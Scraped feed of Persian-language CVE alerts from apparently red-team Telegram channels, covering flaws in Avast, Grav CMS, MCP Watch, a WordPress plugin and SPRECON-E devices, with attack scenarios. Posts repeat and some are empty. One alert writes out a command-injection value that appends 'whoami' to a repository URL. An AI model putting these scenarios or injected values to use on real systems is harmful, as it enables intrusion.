🚨 New Vulnerability Alert: CVE-2025-8351
🔴 Risk Level: CRITICAL (Score: 9.0)
تحلیل آسیبپذیری CVE-2025-8351
شرح آسیبپذیری: 📝
یک آسیبپذیری حاد از نوع سرریز بافر مبتنی بر هیپ (Heap-based Buffer Overflow) و خواندن خارج از محدوده (Out-of-bounds Read) در موتور اسکن آنتیویروس Avast بر روی سیستمعامل macOS شناسایی شده است.
این ضعف امنیتی با شناسه
محصول و نسخههای تحت تاثیر:
محصول:
نسخههای آسیبپذیر: از
تاثیرات بالقوه: 💥
بهرهبرداری موفقیتآمیز از این آسیبپذیری میتواند منجر به دو پیامد اصلی و خطرناک شود:
۱. اجرای کد دلخواه (Local Code Execution):
مهاجم میتواند با ارسال یک فایل مخرب، کدی را با سطح دسترسی فرآیند موتور آنتیویروس (که معمولاً بالا است) بر روی سیستم قربانی اجرا کند. این امر به مهاجم اجازه میدهد تا کنترل سیستم را به دست گرفته، بدافزارهای دیگر را نصب کرده یا به اطلاعات حساس دسترسی پیدا کند.
۲. از کار انداختن سرویس (Denial-of-Service):
در سناریوی دیگر، اسکن فایل مخرب باعث کرش کردن و از کار افتادن کامل موتور آنتیویروس میشود. در این حالت، سیستم دفاع امنیتی خود را از دست داده و در برابر سایر تهدیدات بیدفاع میماند تا زمانی که سرویس به صورت دستی راهاندازی مجدد شود.
سناریوی حمله: 👨💻
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. آمادهسازی: مهاجم یک فایل به ظاهر بیخطر (مانند یک سند PDF، فایل فشرده ZIP یا یک تصویر) را به گونهای دستکاری میکند که حاوی کدهای مخرب برای فعالسازی سرریز بافر باشد.
۲. توزیع: فایل مخرب از طریق روشهای مهندسی اجتماعی مانند ایمیلهای فیشینگ، لینکهای دانلود آلوده در وبسایتها یا حافظههای USB به سیستم قربانی منتقل میشود.
۳. فعالسازی: به محض اینکه کاربر فایل را دانلود، کپی یا تلاش برای باز کردن آن میکند، سپر حفاظتی آنی (Real-time Protection) آنتیویروس Avast به طور خودکار فایل را برای اسکن فراخوانی میکند. همین عمل اسکن، ماشه آسیبپذیری را میچکاند.
۴. بهرهبرداری: با شروع اسکن، کد مخرب درون فایل باعث سرریز بافر در موتور آنتیویروس شده و بسته به هدف مهاجم، یا سرویس آنتیویروس کرش میکند (DoS) یا کد دلخواه مهاجم بر روی سیستم اجرا میشود (LCE).
---
توصیه امنیتی: 💡
به تمامی کاربران آنتیویروس Avast بر روی سیستمعامل macOS اکیداً توصیه میشود که نرمافزار خود را در اسرع وقت به نسخه
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.0)
تحلیل آسیبپذیری CVE-2025-8351
شرح آسیبپذیری: 📝
یک آسیبپذیری حاد از نوع سرریز بافر مبتنی بر هیپ (Heap-based Buffer Overflow) و خواندن خارج از محدوده (Out-of-bounds Read) در موتور اسکن آنتیویروس Avast بر روی سیستمعامل macOS شناسایی شده است.
این ضعف امنیتی با شناسه
CVE-2025-8351، زمانی فعال میشود که موتور آنتیویروس یک فایل با ساختار دستکاریشده و مخرب را اسکن میکند. در این فرآیند، برنامه به دلیل عدم مدیریت صحیح حافظه، دادههایی را خارج از محدوده بافر تخصیصدادهشده میخواند یا در آن مینویسد.محصول و نسخههای تحت تاثیر:
محصول:
Avast Antivirus on MacOSنسخههای آسیبپذیر: از
8.3.70.94 تا قبل از 8.3.70.98تاثیرات بالقوه: 💥
بهرهبرداری موفقیتآمیز از این آسیبپذیری میتواند منجر به دو پیامد اصلی و خطرناک شود:
۱. اجرای کد دلخواه (Local Code Execution):
مهاجم میتواند با ارسال یک فایل مخرب، کدی را با سطح دسترسی فرآیند موتور آنتیویروس (که معمولاً بالا است) بر روی سیستم قربانی اجرا کند. این امر به مهاجم اجازه میدهد تا کنترل سیستم را به دست گرفته، بدافزارهای دیگر را نصب کرده یا به اطلاعات حساس دسترسی پیدا کند.
۲. از کار انداختن سرویس (Denial-of-Service):
در سناریوی دیگر، اسکن فایل مخرب باعث کرش کردن و از کار افتادن کامل موتور آنتیویروس میشود. در این حالت، سیستم دفاع امنیتی خود را از دست داده و در برابر سایر تهدیدات بیدفاع میماند تا زمانی که سرویس به صورت دستی راهاندازی مجدد شود.
سناریوی حمله: 👨💻
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. آمادهسازی: مهاجم یک فایل به ظاهر بیخطر (مانند یک سند PDF، فایل فشرده ZIP یا یک تصویر) را به گونهای دستکاری میکند که حاوی کدهای مخرب برای فعالسازی سرریز بافر باشد.
۲. توزیع: فایل مخرب از طریق روشهای مهندسی اجتماعی مانند ایمیلهای فیشینگ، لینکهای دانلود آلوده در وبسایتها یا حافظههای USB به سیستم قربانی منتقل میشود.
۳. فعالسازی: به محض اینکه کاربر فایل را دانلود، کپی یا تلاش برای باز کردن آن میکند، سپر حفاظتی آنی (Real-time Protection) آنتیویروس Avast به طور خودکار فایل را برای اسکن فراخوانی میکند. همین عمل اسکن، ماشه آسیبپذیری را میچکاند.
۴. بهرهبرداری: با شروع اسکن، کد مخرب درون فایل باعث سرریز بافر در موتور آنتیویروس شده و بسته به هدف مهاجم، یا سرویس آنتیویروس کرش میکند (DoS) یا کد دلخواه مهاجم بر روی سیستم اجرا میشود (LCE).
---
توصیه امنیتی: 💡
به تمامی کاربران آنتیویروس Avast بر روی سیستمعامل macOS اکیداً توصیه میشود که نرمافزار خود را در اسرع وقت به نسخه
8.3.70.98 یا بالاتر بهروزرسانی کنند تا این حفره امنیتی را برطرف نمایند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66296
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | افزایش سطح دسترسی در Grav CMS
---
Vulnerability Description:
آسیبپذیری با شناسه
ریشه مشکل در عدم اعتبارسنجی برای منحصربهفرد بودن نام کاربری هنگام ایجاد یک کاربر جدید است. این نقص به یک مهاجم که دارای مجوز ایجاد کاربر است، اجازه میدهد تا یک حساب کاربری جدید با نام کاربری مشابه یک مدیر ارشد (Administrator) موجود ایجاد کند.
---
Impact:
تأثیر اصلی این آسیبپذیری، افزایش سطح دسترسی از یک کاربر با اختیارات محدود به سطح مدیر کل سیستم است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل وبسایت را به دست آورد.
پیامدهای این حمله شامل موارد زیر است:
- تغییر، حذف یا سرقت تمام محتوای وبسایت.
- دسترسی به اطلاعات حساس کاربران.
- نصب کدهای مخرب یا درهای پشتی (Backdoor) بر روی سرور.
- ایجاد اختلال کامل در عملکرد سرویس.
---
Scenario:
یک سناریوی واقعی برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. مهاجم به یک حساب کاربری با دسترسی محدود، مانند مدیر کاربران (User Manager)، دسترسی پیدا میکند. این حساب، مجوز ایجاد کاربران جدید را دارد اما نمیتواند به تنظیمات اصلی سایت دسترسی داشته باشد.
۲. مهاجم نام کاربری مدیر اصلی سیستم را شناسایی میکند (برای مثال،
۳. مهاجم با استفاده از حساب کاربری محدود خود، یک کاربر جدید با نام کاربری
۴. به دلیل وجود آسیبپذیری، سیستم این نام کاربری تکراری را پذیرفته و عملاً اطلاعات ورود مدیر اصلی را بازنویسی میکند.
۵. اکنون مهاجم میتواند با نام کاربری
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | افزایش سطح دسترسی در Grav CMS
---
Vulnerability Description:
آسیبپذیری با شناسه
CVE-2025-66296 از نوع افزایش سطح دسترسی (Privilege Escalation) در پلاگین Admin پلتفرم مدیریت محتوای Grav شناسایی شده است. این ضعف امنیتی در نسخههای قبل از 1.8.0-beta.27 وجود دارد.ریشه مشکل در عدم اعتبارسنجی برای منحصربهفرد بودن نام کاربری هنگام ایجاد یک کاربر جدید است. این نقص به یک مهاجم که دارای مجوز ایجاد کاربر است، اجازه میدهد تا یک حساب کاربری جدید با نام کاربری مشابه یک مدیر ارشد (Administrator) موجود ایجاد کند.
---
Impact:
تأثیر اصلی این آسیبپذیری، افزایش سطح دسترسی از یک کاربر با اختیارات محدود به سطح مدیر کل سیستم است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل وبسایت را به دست آورد.
پیامدهای این حمله شامل موارد زیر است:
- تغییر، حذف یا سرقت تمام محتوای وبسایت.
- دسترسی به اطلاعات حساس کاربران.
- نصب کدهای مخرب یا درهای پشتی (Backdoor) بر روی سرور.
- ایجاد اختلال کامل در عملکرد سرویس.
---
Scenario:
یک سناریوی واقعی برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. مهاجم به یک حساب کاربری با دسترسی محدود، مانند مدیر کاربران (User Manager)، دسترسی پیدا میکند. این حساب، مجوز ایجاد کاربران جدید را دارد اما نمیتواند به تنظیمات اصلی سایت دسترسی داشته باشد.
۲. مهاجم نام کاربری مدیر اصلی سیستم را شناسایی میکند (برای مثال،
admin).۳. مهاجم با استفاده از حساب کاربری محدود خود، یک کاربر جدید با نام کاربری
admin ایجاد کرده و یک رمز عبور و ایمیل جدید برای آن تعریف میکند.۴. به دلیل وجود آسیبپذیری، سیستم این نام کاربری تکراری را پذیرفته و عملاً اطلاعات ورود مدیر اصلی را بازنویسی میکند.
۵. اکنون مهاجم میتواند با نام کاربری
admin و رمز عبور جدیدی که خود تعریف کرده است وارد سیستم شده و به تمام اختیارات مدیر کل دسترسی پیدا کند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66299
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-66299
شرح آسیبپذیری:
آسیبپذیری با شناسه
مهاجمی که به یک حساب کاربری با سطح دسترسی "ویرایشگر" (Editor) دسترسی داشته باشد، میتواند با دور زدن مکانیزم امنیتی (Sandbox) موتور قالب
تأثیر:
موفقیتآمیز بودن این حمله منجر به اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میشود. این امر به مهاجم کنترل کامل بر روی وبسایت و سرور میزبان را میدهد و میتواند منجر به موارد زیر شود:
- سرقت اطلاعات حساس مانند پایگاه داده، اطلاعات کاربران و فایلهای سرور.
- نصب بدافزار، باجافزار یا دربهای پشتی (Backdoor).
- تغییر ظاهر وبسایت (Defacement).
- استفاده از سرور برای حملات بیشتر به سایر سیستمها.
سطح خطر این آسیبپذیری بحرانی (Critical) ارزیابی میشود.
سناریوی حمله:
۱. مهاجم از طریق روشهایی مانند فیشینگ یا استفاده از رمز عبور افشا شده، به یک حساب کاربری با دسترسی Editor در پنل مدیریت
۲. پس از ورود به پنل، به بخش ویرایش یکی از صفحات وبسایت مراجعه میکند.
۳. در محتوای صفحه، یک قطعه کد مخرب
۴. پس از ذخیره و رندر شدن صفحه، کد مخرب توسط سرور اجرا میشود. برای مثال، مهاجم ابتدا تابعی را ثبت کرده و سپس با استفاده از آن، یک دستور سیستمی مانند
۵. با اجرای موفقیتآمیز دستور، مهاجم کنترل سرور را به دست گرفته و میتواند حملات خود را گسترش دهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-66299
شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-66299 در سیستم مدیریت محتوای Grav CMS شناسایی شده است. این آسیبپذیری از نوع تزریق قالب سمت سرور یا Server-Side Template Injection (SSTI) است و نسخههای قبل از 1.8.0-beta.27 را تحت تأثیر قرار میدهد.مهاجمی که به یک حساب کاربری با سطح دسترسی "ویرایشگر" (Editor) دسترسی داشته باشد، میتواند با دور زدن مکانیزم امنیتی (Sandbox) موتور قالب
Twig، کدهای دلخواه را بر روی سرور اجرا کند. نقطه ضعف اصلی در محافظت ناقص از آبجکت Twig است که به مهاجم اجازه میدهد با تزریق دستورات مخرب در قالب صفحات وب، توابع دلخواه خود را به لیست فیلترهای امن (system.twig.safe_filters) اضافه کرده و در نتیجه Sandbox را دور بزند.تأثیر:
موفقیتآمیز بودن این حمله منجر به اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میشود. این امر به مهاجم کنترل کامل بر روی وبسایت و سرور میزبان را میدهد و میتواند منجر به موارد زیر شود:
- سرقت اطلاعات حساس مانند پایگاه داده، اطلاعات کاربران و فایلهای سرور.
- نصب بدافزار، باجافزار یا دربهای پشتی (Backdoor).
- تغییر ظاهر وبسایت (Defacement).
- استفاده از سرور برای حملات بیشتر به سایر سیستمها.
سطح خطر این آسیبپذیری بحرانی (Critical) ارزیابی میشود.
سناریوی حمله:
۱. مهاجم از طریق روشهایی مانند فیشینگ یا استفاده از رمز عبور افشا شده، به یک حساب کاربری با دسترسی Editor در پنل مدیریت
Grav CMS دست پیدا میکند.۲. پس از ورود به پنل، به بخش ویرایش یکی از صفحات وبسایت مراجعه میکند.
۳. در محتوای صفحه، یک قطعه کد مخرب
Twig تزریق میکند. این کد به گونهای طراحی شده که بتواند یک تابع سیستمی مانند exec را به عنوان یک فیلتر امن ثبت کند.۴. پس از ذخیره و رندر شدن صفحه، کد مخرب توسط سرور اجرا میشود. برای مثال، مهاجم ابتدا تابعی را ثبت کرده و سپس با استفاده از آن، یک دستور سیستمی مانند
id را اجرا میکند.۵. با اجرای موفقیتآمیز دستور، مهاجم کنترل سرور را به دست گرفته و میتواند حملات خود را گسترش دهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66300
🟠 Risk Level: HIGH (Score: 8.5)
تحلیل آسیبپذیری خواندن فایل در پلتفرم Grav
شناسه:
آسیبپذیری:
این آسیبپذیری در پلتفرم وب فایلمحور Grav و در نسخههای پیش از
تأثیر:
تأثیر اصلی این آسیبپذیری بسیار جدی است. مهاجم میتواند فایلهای حساس مربوط به حسابهای کاربری (واقع در مسیر
سناریو:
یک سناریوی حمله به شرح زیر است:
۱. مهاجم به یک حساب کاربری با سطح دسترسی پایین (مانند یک نویسنده یا ویرایشگر) در وبسایت مبتنی بر Grav دسترسی پیدا میکند.
۲. با استفاده از مجوز ویرایش صفحات، مهاجم یک payload مخرب در بخش "Frontmatter" یک صفحه ایجاد یا ویرایش میکند.
۳. این payload آسیبپذیری را فعال کرده و به مهاجم اجازه میدهد محتوای فایل حساب کاربری ادمین (مثلاً
۴. مهاجم توکن بازنشانی رمز عبور یا هش رمز عبور را از محتوای فایل استخراج میکند.
۵. در نهایت، با استفاده از توکن، رمز عبور حساب ادمین را تغییر داده و به سطح دسترسی کامل در سیستم دست پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.5)
تحلیل آسیبپذیری خواندن فایل در پلتفرم Grav
شناسه:
CVE-2025-66300آسیبپذیری:
این آسیبپذیری در پلتفرم وب فایلمحور Grav و در نسخههای پیش از
1.8.0-beta.27 وجود دارد. یک کاربر با سطح دسترسی پایین که صرفاً مجوز ویرایش صفحات (page editing) را دارد، میتواند با سوءاستفاده از فرم "Frontmatter"، به فایلهای دلخواه روی سرور دسترسی خواندن پیدا کند.تأثیر:
تأثیر اصلی این آسیبپذیری بسیار جدی است. مهاجم میتواند فایلهای حساس مربوط به حسابهای کاربری (واقع در مسیر
/grav/user/accounts/*.yaml) را بخواند. این فایلها حاوی اطلاعات حیاتی مانند هش رمز عبور، کلید محرمانه احراز هویت دو عاملی (2FA) و توکن بازنشانی رمز عبور هستند. در نتیجه، مهاجم قادر خواهد بود با به دست آوردن توکن، رمز عبور هر کاربری را بازنشانی کرده و کنترل کامل حساب او را به دست گیرد یا با کرک کردن هش، به کلمه عبور اصلی دست پیدا کند.سناریو:
یک سناریوی حمله به شرح زیر است:
۱. مهاجم به یک حساب کاربری با سطح دسترسی پایین (مانند یک نویسنده یا ویرایشگر) در وبسایت مبتنی بر Grav دسترسی پیدا میکند.
۲. با استفاده از مجوز ویرایش صفحات، مهاجم یک payload مخرب در بخش "Frontmatter" یک صفحه ایجاد یا ویرایش میکند.
۳. این payload آسیبپذیری را فعال کرده و به مهاجم اجازه میدهد محتوای فایل حساب کاربری ادمین (مثلاً
admin.yaml) را بخواند.۴. مهاجم توکن بازنشانی رمز عبور یا هش رمز عبور را از محتوای فایل استخراج میکند.
۵. در نهایت، با استفاده از توکن، رمز عبور حساب ادمین را تغییر داده و به سطح دسترسی کامل در سیستم دست پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66401
🔴 Risk Level: CRITICAL (Score: 9.8)
گزارش تحلیل آسیبپذیری | CVE-2025-66401
تحلیل یک آسیبپذیری حیاتی از نوع Command Injection در ابزار
شرح آسیبپذیری:
ابزار اسکنر امنیتی
تأثیر:
یک مهاجم میتواند با افزودن متاکاراکترهای شل (مانند
سناریوی حمله:
۱. مهاجم یک URL مخرب را به شکل زیر ایجاد میکند. در این مثال، دستور
۲. این URL مخرب به عنوان ورودی به متد
۳. برنامه بدون اعتبارسنجی، دستور کامل را در شل سیستم اجرا میکند. در نتیجه، پس از تلاش برای کلون کردن مخزن، دستور
۴. مهاجم میتواند خروجی دستور را مشاهده کرده و تأیید کند که کنترل اجرای دستورات بر روی سیستم را به دست آورده است. در مراحل بعدی، مهاجم میتواند از دستورات بسیار مخربتری برای دستیابی به اهداف خود استفاده کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
گزارش تحلیل آسیبپذیری | CVE-2025-66401
تحلیل یک آسیبپذیری حیاتی از نوع Command Injection در ابزار
MCP Watch.شرح آسیبپذیری:
ابزار اسکنر امنیتی
MCP Watch در نسخههای 0.1.2 و قدیمیتر، دارای یک آسیبپذیری بسیار حیاتی از نوع تزریق دستور (Command Injection) است. این ضعف امنیتی در متد cloneRepo از کلاس MCPScanner قرار دارد. برنامه، پارامتر ورودی githubUrl را که توسط کاربر ارائه میشود، بدون هیچگونه پاکسازی یا اعتبارسنجی، مستقیماً به یک دستور سیستمی از طریق execSync ارسال میکند.تأثیر:
یک مهاجم میتواند با افزودن متاکاراکترهای شل (مانند
;, |, &&) به انتهای آدرس URL، دستورات دلخواه خود را بر روی ماشین میزبان اجرا کند. این آسیبپذیری منجر به اجرای کد از راه دور (RCE) شده و به مهاجم امکان کنترل کامل سرور، سرقت اطلاعات حساس، نصب بدافزار و یا از کار انداختن سرویسها را میدهد. شدت این آسیبپذیری بحرانی (Critical) ارزیابی میشود.سناریوی حمله:
۱. مهاجم یک URL مخرب را به شکل زیر ایجاد میکند. در این مثال، دستور
whoami برای شناسایی کاربر فعلی سیستم به انتهای URL اضافه شده است:https://github.com/user/repo.git; whoami۲. این URL مخرب به عنوان ورودی به متد
cloneRepo داده میشود.۳. برنامه بدون اعتبارسنجی، دستور کامل را در شل سیستم اجرا میکند. در نتیجه، پس از تلاش برای کلون کردن مخزن، دستور
whoami نیز بر روی سرور اجرا میشود.۴. مهاجم میتواند خروجی دستور را مشاهده کرده و تأیید کند که کنترل اجرای دستورات بر روی سیستم را به دست آورده است. در مراحل بعدی، مهاجم میتواند از دستورات بسیار مخربتری برای دستیابی به اهداف خود استفاده کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-3500
🔴 Risk Level: CRITICAL (Score: 9.0)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.0)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2024-45675
🟠 Risk Level: HIGH (Score: 8.4)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.4)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12529
🟠 Risk Level: HIGH (Score: 8.8)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13516
🟠 Risk Level: HIGH (Score: 8.1)
🔬 شرح آسیبپذیری:
یک آسیبپذیری از نوع آپلود فایل بدون محدودیت (Unrestricted File Upload) با شناسه
این ضعف امنیتی به دلیل عملکرد نادرست تابع
نام فایلهای ذخیره شده بر اساس هش
---
💥 تاثیرات:
تاثیر اصلی این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میزبان وبسایت است.
یک مهاجم احراز هویت نشده میتواند با بهرهبرداری از این ضعف، یک فایل PHP مخرب (مانند یک وبشل) را آپلود کرده و کنترل کامل وبسایت را در دست بگیرد. این دسترسی میتواند منجر به سرقت اطلاعات حساس کاربران، تغییر چهره وبسایت (Defacement)، نصب درب پشتی (Backdoor) برای دسترسیهای آتی و یا استفاده از سرور برای انجام حملات دیگر شود. شدت این آسیبپذیری در سطح بحرانی (Critical) طبقهبندی میشود.
---
🎯 سناریوی حمله:
سناریوی حمله به صورت گام به گام به شرح زیر است:
۱. مهاجم یک وبسایت وردپرسی را که از نسخه آسیبپذیر پلاگین
۲. مهاجم یک فایل PHP مخرب (مانند یک شل ساده) آماده کرده و هش
۳. مهاجم از طریق یک فرم عمومی در وبسایت که قابلیت ارسال فایل پیوست دارد (مانند فرم "تماس با ما" یا "ارسال رزومه")، فایل مخرب خود را آپلود میکند.
۴. پلاگین فایل را بدون هیچگونه فیلترینگ در دایرکتوری عمومی ذخیره میکند.
۵. در نهایت، مهاجم با فراخوانی مستقیم URL فایل آپلود شده در مرورگر، کد مخرب خود را بر روی سرور اجرا کرده و به اهداف خود دست مییابد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.1)
🔬 شرح آسیبپذیری:
یک آسیبپذیری از نوع آپلود فایل بدون محدودیت (Unrestricted File Upload) با شناسه
CVE-2025-13516 در پلاگین وردپرسی SureMail – SMTP and Email Logs در نسخههای 1.9.0 و پایینتر شناسایی شده است.این ضعف امنیتی به دلیل عملکرد نادرست تابع
save_file() در فایل inc/emails/handler/uploads.php رخ میدهد. این تابع تمامی فایلهای پیوست شده به ایمیلها را بدون هیچگونه اعتبارسنجی برای نوع یا پسوند فایل، در یک دایرکتوری عمومی و قابل دسترس از طریق وب (wp-content/uploads/suremails/attachments/) کپی میکند.نام فایلهای ذخیره شده بر اساس هش
MD5 محتوای آنها تولید میشود که این امر باعث قابل پیشبینی بودن نام نهایی فایل برای مهاجم میگردد. اگرچه توسعهدهنده تلاش کرده تا با یک فایل .htaccess از اجرای کدهای PHP در این دایرکتوری جلوگیری کند، اما این مکانیزم دفاعی تنها روی سرورهای Apache موثر است و در سرورهایی مانند nginx، IIS و یا کانفیگهای نادرست Apache کاملاً بیاثر است.---
💥 تاثیرات:
تاثیر اصلی این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور میزبان وبسایت است.
یک مهاجم احراز هویت نشده میتواند با بهرهبرداری از این ضعف، یک فایل PHP مخرب (مانند یک وبشل) را آپلود کرده و کنترل کامل وبسایت را در دست بگیرد. این دسترسی میتواند منجر به سرقت اطلاعات حساس کاربران، تغییر چهره وبسایت (Defacement)، نصب درب پشتی (Backdoor) برای دسترسیهای آتی و یا استفاده از سرور برای انجام حملات دیگر شود. شدت این آسیبپذیری در سطح بحرانی (Critical) طبقهبندی میشود.
---
🎯 سناریوی حمله:
سناریوی حمله به صورت گام به گام به شرح زیر است:
۱. مهاجم یک وبسایت وردپرسی را که از نسخه آسیبپذیر پلاگین
SureMail بر روی یک وبسرور غیر از Apache (مانند nginx) استفاده میکند، شناسایی میکند.۲. مهاجم یک فایل PHP مخرب (مانند یک شل ساده) آماده کرده و هش
MD5 محتوای آن را برای پیشبینی نام فایل نهایی روی سرور محاسبه میکند.۳. مهاجم از طریق یک فرم عمومی در وبسایت که قابلیت ارسال فایل پیوست دارد (مانند فرم "تماس با ما" یا "ارسال رزومه")، فایل مخرب خود را آپلود میکند.
۴. پلاگین فایل را بدون هیچگونه فیلترینگ در دایرکتوری عمومی ذخیره میکند.
۵. در نهایت، مهاجم با فراخوانی مستقیم URL فایل آپلود شده در مرورگر، کد مخرب خود را بر روی سرور اجرا کرده و به اهداف خود دست مییابد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-41744
🔴 Risk Level: CRITICAL (Score: 9.1)
🔎 شرح آسیبپذیری:
آسیبپذیری با شناسه
این بدان معناست که یک کلید یکسان برای رمزنگاری ارتباطات در تمامی دستگاههای این سری به کار رفته است. این ضعف به یک مهاجم از راه دور و بدون نیاز به دسترسی خاص (Unprivileged) اجازه میدهد تا با در اختیار داشتن این کلید پیشفرض، به سادگی تمامی ارتباطات رمزگذاریشده را رمزگشایی کرده و محتوای آنها را مشاهده یا دستکاری کند.
⚠️ میزان تأثیر:
تأثیر این آسیبپذیری بسیار بالا ارزیابی میشود، زیرا دو اصل کلیدی امنیت یعنی محرمانگی (Confidentiality) و یکپارچگی (Integrity) را به طور کامل نقض میکند.
نقض محرمانگی: مهاجم میتواند دادههای حساس عملیاتی و کنترلی که بین تجهیزات صنعتی (ICS/SCADA) رد و بدل میشود را شنود کرده و به اطلاعات حیاتی دست یابد.
نقض یکپارچگی: خطرناکتر از آن، مهاجم قادر است فرامین و دادههای در حال تبادل را در میانه راه تغییر دهد. برای مثال، میتواند مقادیر سنسورها را جعل کرده یا دستورات مخربی را به سیستمهای کنترل ارسال کند که منجر به اختلال فیزیکی در عملکرد زیرساختهای حیاتی (مانند شبکههای برق) میشود.
🎯 سناریوی حمله:
یک مهاجم میتواند سناریوی زیر را پیادهسازی کند:
1. مهاجم یک دستگاه آسیبپذیر
2. با اجرای یک حمله Man-in-the-Middle (MitM)، ترافیک شبکه بین دستگاه و مرکز کنترل را رهگیری میکند.
3. با استفاده از کلید رمزنگاری پیشفرض و عمومیشده، بستههای داده رمزنگاریشده را به سادگی رمزگشایی میکند.
4. در این مرحله، مهاجم میتواند به صورت غیرفعال اطلاعات را مشاهده کند یا به صورت فعال، دستورات جعلی مانند
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.1)
🔎 شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-41744 در سری محصولات SPRECON-E از شرکت Sprecher Automation شناسایی شده است. مشکل اصلی، استفاده از کلیدهای رمزنگاری پیشفرض و ثابت در این دستگاهها است.این بدان معناست که یک کلید یکسان برای رمزنگاری ارتباطات در تمامی دستگاههای این سری به کار رفته است. این ضعف به یک مهاجم از راه دور و بدون نیاز به دسترسی خاص (Unprivileged) اجازه میدهد تا با در اختیار داشتن این کلید پیشفرض، به سادگی تمامی ارتباطات رمزگذاریشده را رمزگشایی کرده و محتوای آنها را مشاهده یا دستکاری کند.
⚠️ میزان تأثیر:
تأثیر این آسیبپذیری بسیار بالا ارزیابی میشود، زیرا دو اصل کلیدی امنیت یعنی محرمانگی (Confidentiality) و یکپارچگی (Integrity) را به طور کامل نقض میکند.
نقض محرمانگی: مهاجم میتواند دادههای حساس عملیاتی و کنترلی که بین تجهیزات صنعتی (ICS/SCADA) رد و بدل میشود را شنود کرده و به اطلاعات حیاتی دست یابد.
نقض یکپارچگی: خطرناکتر از آن، مهاجم قادر است فرامین و دادههای در حال تبادل را در میانه راه تغییر دهد. برای مثال، میتواند مقادیر سنسورها را جعل کرده یا دستورات مخربی را به سیستمهای کنترل ارسال کند که منجر به اختلال فیزیکی در عملکرد زیرساختهای حیاتی (مانند شبکههای برق) میشود.
🎯 سناریوی حمله:
یک مهاجم میتواند سناریوی زیر را پیادهسازی کند:
1. مهاجم یک دستگاه آسیبپذیر
SPRECON-E را که به شبکه متصل است، شناسایی میکند.2. با اجرای یک حمله Man-in-the-Middle (MitM)، ترافیک شبکه بین دستگاه و مرکز کنترل را رهگیری میکند.
